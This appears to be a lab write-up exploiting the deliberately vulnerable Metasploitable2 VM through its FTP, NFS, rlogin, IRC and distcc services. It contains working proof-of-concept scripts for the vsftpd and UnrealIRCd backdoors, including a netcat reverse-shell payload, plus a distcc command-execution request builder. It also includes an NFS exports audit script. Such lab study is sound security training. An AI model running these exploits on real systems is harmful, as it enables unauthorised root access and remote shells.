In this post I’m going to be exploring Metasploitable 2.
Metasploitable2 is a vulnerable machine from the good folks at Rapid7. It is “an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities.”
Ok, let’s get to it.
A quick nmap of the host to see which services are running:
user@kali:~$ nmap 172.16.255.138

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-05-17 17:51 CDT
Nmap scan report for 172.16.255.138
Host is up (0.0023s latency).
Not shown: 978 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8180/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 13.28 seconds
Nearly every one of these services is a potential entry point. From here I will go one by one and cover how to exploit the ones that are exploitable.
Regarding HTTP: Metasploitable2’s web-app component is robust. It contains the “Damn Vulnerable Web App” as well as some other vulnerable web applications like NOWASP Mutillidae, phpMyAdmin, tikiwiki, and WebDav. I’ve gone through those as well, but since it could fill a whole post on its own I’ll be saving that to cover another day. This time we’re just going to be penetrating the other vulnerable services.
FTP

The host is running a vulnerable FTP server:
user@kali:~$ nmap -sV -p 21 172.16.255.138

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-05-17 17:55 CDT
Nmap scan report for 172.16.255.138
Host is up (0.00066s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.33 seconds
Version 2.3.4 of vsftpd contains a known backdoor (CVE-2011-2523). It was not a coding mistake: briefly in mid-2011 the tarball on the project's download site was replaced with a trojaned copy. If the username sent in the USER command contains the two characters “:)”, the daemon spawns a shell listening on TCP port 6200. vsftpd has not dropped privileges at that point, so the shell runs as root.
user@kali:~$ ftp 172.16.255.138
Connected to 172.16.255.138.
220 (vsFTPd 2.3.4)
Name (172.16.255.138:user): hacker:)
331 Please specify the password.
Password:
At which point the server will appear to hang. But if we connect to port 6200:
user@kali:~$ ncat -v 172.16.255.138 6200
Ncat: Version 7.25BETA1 ( https://nmap.org/ncat )
Ncat: Connected to 172.16.255.138:6200.
id
uid=0(root) gid=0(root)
We find a root shell.
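The same exchange as a script, added here as an example that is not part of the original post: it sends the smiley-face USER command, waits out the hung PASS, then connects to the bind shell and runs one command. The FakeVsftpd class is a constructed stand-in that imitates the trojaned daemon on two loopback ports so the flow can be exercised offline; the host and port arguments are my assumptions, not anything from the post.

```python
#!/usr/bin/env python3
"""Trigger the vsftpd 2.3.4 backdoor and use the bind shell it opens.

Added example, not code from the original post. FakeVsftpd is a
constructed stand-in for the trojaned daemon so the flow runs offline.
"""
import socket
import threading

BACKDOOR_PORT = 6200


def trigger_backdoor(host, ftp_port=21, user="hacker:)", timeout=3):
    """Log in with a username containing ':)' and return the banner.

    The real daemon answers USER with 331, then stops responding once
    the backdoor has forked its listener on 6200.
    """
    with socket.create_connection((host, ftp_port), timeout=timeout) as s:
        banner = s.recv(1024).decode(errors="replace").strip()
        s.sendall(("USER %s\r\n" % user).encode())
        s.recv(1024)                       # 331 Please specify the password.
        s.sendall(b"PASS anything\r\n")    # never answered once triggered
        try:
            s.recv(1024)
        except socket.timeout:
            pass
    return banner


def run_command(host, cmd, shell_port=BACKDOOR_PORT, timeout=2):
    """Send one command to the bind shell and collect whatever comes back."""
    with socket.create_connection((host, shell_port), timeout=timeout) as s:
        s.sendall((cmd + "\n").encode())
        chunks = []
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks).decode(errors="replace")


def exploit(host, ftp_port=21, shell_port=BACKDOOR_PORT):
    """Return (banner, output of `id` on the target, or None if not 2.3.4)."""
    banner = trigger_backdoor(host, ftp_port)
    if "2.3.4" not in banner:
        return banner, None      # some other vsftpd: no backdoor to talk to
    return banner, run_command(host, "id", shell_port)


class FakeVsftpd:
    """Constructed imitation of the backdoored daemon (NOT real vsftpd).

    One ephemeral loopback port plays the FTP service, another plays the
    shell the real backdoor binds to 6200.
    """

    def __init__(self):
        self.ftp = self._listen()
        self.shell = self._listen()
        self.ftp_port = self.ftp.getsockname()[1]
        self.shell_port = self.shell.getsockname()[1]
        self.triggered = False
        threading.Thread(target=self._serve_ftp, daemon=True).start()

    @staticmethod
    def _listen():
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.bind(("127.0.0.1", 0))
        sock.listen(1)
        return sock

    def _serve_ftp(self):
        conn, _ = self.ftp.accept()
        with conn:
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
            line = conn.recv(1024)
            conn.sendall(b"331 Please specify the password.\r\n")
            if line.startswith(b"USER ") and b":)" in line:
                self.triggered = True          # the smiley is the trigger
                threading.Thread(target=self._serve_shell, daemon=True).start()
                conn.recv(1024)                # swallow PASS, never reply
            else:
                conn.recv(1024)
                conn.sendall(b"530 Login incorrect.\r\n")

    def _serve_shell(self):
        conn, _ = self.shell.accept()
        with conn:
            cmd = conn.recv(1024).strip()
            conn.sendall(b"uid=0(root) gid=0(root)\n" if cmd == b"id" else b"")


def demo():
    """Run the PoC against the offline stand-in: (banner, id output, triggered)."""
    srv = FakeVsftpd()
    banner, out = exploit("127.0.0.1", srv.ftp_port, srv.shell_port)
    return banner, (out or "").strip(), srv.triggered


if __name__ == "__main__":
    print(demo())
```

Against a real target you would call exploit("172.16.255.138") with the defaults; the banner check is there because the trigger is harmless on any other vsftpd version, so there is no point hanging around on 6200 if the banner is not 2.3.4.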
NFS and SSH
The host serves NFS, and exports its root directory to every host:
user@kali:~$ showmount -e 172.16.255.138
Export list for 172.16.255.138:
/ *
We simply mount the share and append our SSH public key to root's authorized_keys file. This only works because the export is writable and not root-squashed: with the default root_squash option our writes would arrive as the anonymous nobody user and be refused on /root. If root's .ssh directory did not already exist we would create it with mode 700 and the key file with mode 600, otherwise sshd ignores it.
root@kali:~# mkdir /tmp/metasploitable2
root@kali:~# mount -t nfs 172.16.255.138:/ /tmp/metasploitable2
root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:BpNPzUAgrHze66YBnpOoxChRyhWhq4JQwfFwVNL/5Z4 root@kali
The key's randomart image is:
+---[RSA 2048]----+
|   .+**oooo      |
|   o=oo.. +      |
|  ooo. +.. o     |
|.+= . =. .       |
|+o.o . S. o      |
|*+ +. .. . .     |
|Bo= . . . .      |
|= . .o E         |
|. .+.            |
+----[SHA256]-----+
root@kali:~# cat ~/.ssh/id_rsa.pub >> /tmp/metasploitable2/root/.ssh/authorized_keys
root@kali:~# umount /tmp/metasploitable2
root@kali:~# rmdir /tmp/metasploitable2
And then successfully log in as root:
root@kali:~# ssh root@172.16.255.138
[...]
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
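The defensive side of this, as an added example that is not from the original post: a small audit of /etc/exports that flags the combination the attack depended on (exported to everyone, writable, no_root_squash, and the root of the filesystem at that). EXPORTS_SAMPLE is constructed; its first line is modelled on the world-exported root share above, the other lines are made up to show entries that do and do not get flagged.

```python
#!/usr/bin/env python3
"""Audit /etc/exports for the combination that made the NFS trick work.

Added example, not from the post. EXPORTS_SAMPLE is constructed; the
first entry is modelled on Metasploitable2's world-exported root share.
"""
import re

EXPORTS_SAMPLE = """\
# constructed sample
/          *(rw,sync,no_root_squash,no_subtree_check)
/srv/pub   192.168.1.0/24(ro,sync)
/home      *.corp.example(rw,sync)   10.0.0.5(rw,sync,root_squash)
"""

# client spec is  host(opt,opt)  or a bare host; an empty host means everyone
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return [(path, client, set_of_options)], one entry per client group."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients:
            m = CLIENT_RE.match(spec)
            client = m.group(1) or "*"        # exports(5): "(opts)" alone = all hosts
            opts = {o for o in (m.group(2) or "").split(",") if o}
            entries.append((path, client, opts))
    return entries


def audit(entries):
    """Flag entries a remote client could write to, worse still as root.

    exports(5) defaults are ro and root_squash, so only options that were
    spelled out can make an entry dangerous.
    """
    findings = []
    for path, client, opts in entries:
        problems = []
        if client == "*":
            problems.append("exported to every host")
        elif "*" in client or "?" in client:
            problems.append("wildcard client %s" % client)
        if "rw" in opts:
            problems.append("writable")
        if "no_root_squash" in opts:
            problems.append("no_root_squash: remote uid 0 stays uid 0")
        if path == "/":
            problems.append("whole filesystem exported")
        if problems:
            findings.append((path, client, problems))
    return findings


if __name__ == "__main__":
    for path, client, problems in audit(parse_exports(EXPORTS_SAMPLE)):
        print("%-10s %-20s %s" % (path, client, "; ".join(problems)))
```

Run against a real file with audit(parse_exports(open("/etc/exports").read())). The writable-plus-no_root_squash-plus-wildcard finding is the one that turns an NFS share into a root shell; an ro export, or one that keeps root_squash, would have stopped the authorized_keys trick above.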
rlogin

Ports 512, 513 and 514 (rexec, rlogin and rsh) are open, so the Berkeley r-services are enabled. Two things are worth knowing before trying it: on Kali the rlogin command is an alternatives symlink to ssh unless the rsh-client package is installed, and a passwordless login only succeeds when the target's ~/.rhosts or /etc/hosts.equiv trusts the calling host and user, which is exactly the misconfiguration here.
I test it out, and discover I can login as root with no password:
user@kali:~$ rlogin -l root 172.16.255.138
[...]
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
Too bad they can’t all be so easy! ;)
IRC

The IRC service is UnrealIRCd 3.2.8.1:
user@kali:~$ nmap -sV -p 6667 172.16.255.138

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-05-17 13:11 CDT
Nmap scan report for 172.16.255.138
Host is up (0.0018s latency).
PORT     STATE SERVICE VERSION
6667/tcp open  irc     Unreal ircd
Service Info: Host: irc.Metasploitable.LAN
Which has a known backdoor (CVE-2010-2075): the 3.2.8.1 tarball on some of the project's mirrors was trojaned for several months in 2009 and 2010, and any line the server receives that begins with “AB” is passed, minus that prefix, straight to system(). The command runs with the privileges of the ircd process, which on Metasploitable2 is root.
Instead of using the Metasploit module, however, I’m going to write my own PoC.
#!/usr/bin/env python
import socket

rhost = '172.16.255.138'   # Metasploitable2
rport = 6667               # UnrealIRCd
lhost = '172.16.255.133'   # my Kali box, where ncat is listening
lport = 80

# Any line starting with "AB" is handed to system() by the backdoored
# ircd; everything after it is the command.
payload = "AB;" + "nc %s %d -e /bin/sh;" % (lhost, lport) + "\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost, rport))
print(s.recv(1024))          # server greeting
s.send(payload.encode())     # .encode() keeps this working on Python 3 too
s.close()
It’s a bit minimalist, but it will work. The script connects to the vulnerable service and has the target's netcat push a reverse shell back to my attacking machine on port 80 (the -e flag works here because the target's nc is the traditional netcat build; the OpenBSD netcat lacks it).
user@kali:~$ chmod u+x unreal.py
user@kali:~$ ./unreal.py
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
Meanwhile I have an ncat listener waiting:
root@kali:~# ncat -v -lp 80
Ncat: Version 7.25BETA1 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 172.16.255.138.
Ncat: Connection from 172.16.255.138:56391.
id
uid=0(root) gid=0(root)
distcc

Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. It makes it easy to scale large compiler jobs across multiple systems. Its daemon, distccd, listens on TCP 3632 and, in the version on Metasploitable2, accepts jobs from any client and runs whatever “compiler” the job names (CVE-2004-2687). Note that it did not show up in the default nmap scan above, which only covers the 1,000 most common ports; a full -p- scan finds it. It’s a gaping security hole for us to punch through.
This time I’ll be turning to Metasploit to exploit the vulnerability.
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > set RHOST 172.16.255.138
msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo al9BfrqMBh5PC0Yo;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "al9BfrqMBh5PC0Yo\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.255.138:4444 -> 172.16.255.130:38897) at 2017-04-16 16:23:15 -0700

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Simple. Metasploit makes exploitation a breeze. Note that, unlike the root shells above, this one only runs as the daemon user; getting to root from here would take a separate local privilege escalation.
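What the module actually puts on the wire, as an added example that is neither the post's code nor Metasploit's own: my reconstruction of the distcc protocol-1 job that names sh as the compiler, plus a parser for the daemon's reply tokens. Each token is a 4-byte name and 8 hex digits; DIST, ARGC, DONE and STAT carry their value in those digits, every other token is followed by that many bytes of body. SAMPLE_REPLY is constructed so the parser can be exercised offline; the host and port in run() are assumptions.

```python
#!/usr/bin/env python3
"""Build a distcc job that runs a shell command, and parse the daemon's reply.

Added example: my own reconstruction of what the distcc_exec module sends,
not the post's code nor Metasploit's. SAMPLE_REPLY is constructed.
"""
import socket

NUMERIC = {"DIST", "ARGC", "DONE", "STAT"}   # value lives in the length field


def token(name, value):
    """Encode one token: ints go in the hex field, bytes get a body."""
    if isinstance(value, int):
        return name.encode() + b"%08x" % value
    return name.encode() + b"%08x" % len(value) + value


def build_request(cmd):
    """distccd executes argv[0] as the compiler, so 'sh -c CMD' runs CMD.

    The trailing '#', -c main.c, -o main.o keep the job looking like a
    compile; to sh they are only positional parameters.
    """
    argv = ["sh", "-c", cmd, "#", "-c", "main.c", "-o", "main.o"]
    req = token("DIST", 1) + token("ARGC", len(argv))
    for arg in argv:
        req += token("ARGV", arg.encode())
    return req + token("DOTI", b"A")     # one byte of "preprocessed source"


def parse_tokens(data):
    """Decode a token stream into [(name, int-or-bytes)]; raise on truncation."""
    out, i = [], 0
    while i < len(data):
        name, hexlen = data[i:i + 4].decode(), data[i + 4:i + 12]
        if len(hexlen) != 8:
            raise ValueError("truncated token header at offset %d" % i)
        n = int(hexlen, 16)
        i += 12
        if name in NUMERIC:
            out.append((name, n))
            continue
        if i + n > len(data):
            raise ValueError("truncated %s body" % name)
        out.append((name, data[i:i + n]))
        i += n
    return out


def summarize(tokens):
    """(exit status, stdout, stderr) of the command the daemon ran."""
    d = dict(tokens)
    return d.get("STAT"), d.get("SOUT", b""), d.get("SERR", b"")


def run(host, cmd, port=3632, timeout=5):
    """Send the job to a live distccd and return summarize() of its reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(cmd))
        buf = b""
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            buf += chunk
    return summarize(parse_tokens(buf))


# Constructed reply, in the order distccd sends its tokens, for offline use.
SAMPLE_REPLY = (token("DONE", 1) + token("STAT", 0) + token("SERR", b"")
                + token("SOUT", b"uid=1(daemon) gid=1(daemon)\n") + token("DOTO", b""))

if __name__ == "__main__":
    print(build_request("id"))
    print(summarize(parse_tokens(SAMPLE_REPLY)))
```

run("172.16.255.138", "id") would return the command's exit status and output without any reverse-shell plumbing. The fix on the server side is the one later distcc versions force on you: distccd refuses to start without --allow, so only listed client networks can submit jobs.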
Weak credentials

Many of the accounts on Metasploitable2 use weak or default credentials. These can be brute-forced with tools like Hydra or Medusa, or simply guessed (e.g. user:user, msfadmin:msfadmin); msfadmin can sudo to root, so that one guess is enough on its own.
Metasploitable2 was my first intentionally vulnerable VM to attack and exploit. It was a lot of fun and I’m looking forward to moving on to harder challenges.
Until next time, EOF